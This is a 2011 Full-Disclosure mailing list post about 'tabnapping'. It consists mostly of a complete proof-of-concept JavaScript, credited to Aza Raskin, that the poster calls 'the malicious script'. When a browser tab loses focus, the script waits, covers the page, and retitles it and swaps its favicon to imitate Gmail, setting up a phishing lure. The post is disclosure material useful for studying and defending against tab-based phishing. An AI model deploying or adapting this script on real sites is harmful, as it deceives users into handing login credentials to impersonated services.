lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <BANLkTikO2Bjq-8jfGWTOcu+vfOjCABXw2w@mail.gmail.com>
Date: Wed, 8 Jun 2011 20:12:42 -0700
From: t0hitsugu <tohitsugu@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: tabnapping

I just stumbled across this (credit goes to
http://www.pjlantz.com/2010/05/tabnapping.html and Aza Raskin) and while
rough, certainly has potential given the right circumstances.

I added a quick PoC, though I'm on a NAT and can't provide you a working
link atm, though it seemed to work fine using the latest Fenic beta. That
being said, it also worked on my box using a variety of user agents, so I'm
not certain this is even a mobile-specific problem.

The malicious script is as follows:

>
> /*
> Copyright (c) 2010 Aza Raskin
> http://azarask.in
>
> Permission is hereby granted, free of charge, to any person
> obtaining a copy of this software and associated documentation
> files (the "Software"), to deal in the Software without
> restriction, including without limitation the rights to use,
> copy, modify, merge, publish, distribute, sublicense, and/or sell
> copies of the Software, and to permit persons to whom the
> Software is furnished to do so, subject to the following
> conditions:
>
> The above copyright notice and this permission notice shall be
> included in all copies or substantial portions of the Software.
> */
>
>
> (function(){
>
> var TIMER = null;
> var HAS_SWITCHED = false;
>
> // Events
> window.onblur = function(){
>   TIMER = setTimeout(changeItUp, 5000);
> }
>
> window.onfocus = function(){
>   if(TIMER) clearTimeout(TIMER);
> }
>
> // Utils
> function setTitle(text){ document.title = text; }
>
> // This favicon object rewritten from:
> // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon
].
> // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox
and Opera.
>
> favicon = {
>   docHead: document.getElementsByTagName("head")[0],
>   set: function(url){
>     this.addLink(url);
>   },
>
>   addLink: function(iconURL) {
>     var link = document.createElement("link");
>     link.type = "image/x-icon";
>     link.rel = "shortcut icon";
>     link.href = iconURL;
>     this.removeLinkIfExists();
>     this.docHead.appendChild(link);
>   },
>
>   removeLinkIfExists: function() {
>     var links = this.docHead.getElementsByTagName("link");
>     for (var i=0; i<links.length; i++) {
>       var link = links[i];
>       if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
>         this.docHead.removeChild(link);
>         return; // Assuming only one match at most.
>       }
>     }
>   },
>
>   get: function() {
>     var links = this.docHead.getElementsByTagName("link");
>     for (var i=0; i<links.length; i++) {
>       var link = links[i];
>       if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
>         return link.href;
>       }
>     }
>   }
> };
>
>
> function createShield(){
>   div = document.createElement("div");
>   div.style.position = "fixed";
>   div.style.top = 0;
>   div.style.left = 0;
>   div.style.backgroundColor = "white";
>   div.style.width = "100%";
>   div.style.height = "100%";
>   div.style.textAlign = "center";
>   document.body.style.overflow = "hidden";
>
>   img = document.createElement("img");
>   img.style.paddingTop = "15px";
>   img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png
";
>
>   var oldTitle = document.title;
>   var oldFavicon = favicon.get() || "/favicon.ico";
>
>   div.appendChild(img);
>   document.body.appendChild(div);
>   img.onclick = function(){
>     div.parentNode.removeChild(div);
>     document.body.style.overflow = "auto";
>     setTitle(oldTitle);
>     favicon.set(oldFavicon)
>   }
>
>
> }
>
> function changeItUp(){
>   if( HAS_SWITCHED == false ){
>     createShield("https://mail.google.com");
>     setTitle( "Gmail: Email from Google");
>     favicon.set("https://mail.google.com/favicon.ico");
>     HAS_SWITCHED = true;
>   }
> }
>
>
> })();

Content of type "text/html" skipped

View attachment "tabnab.html" of type "text/html" (20086 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ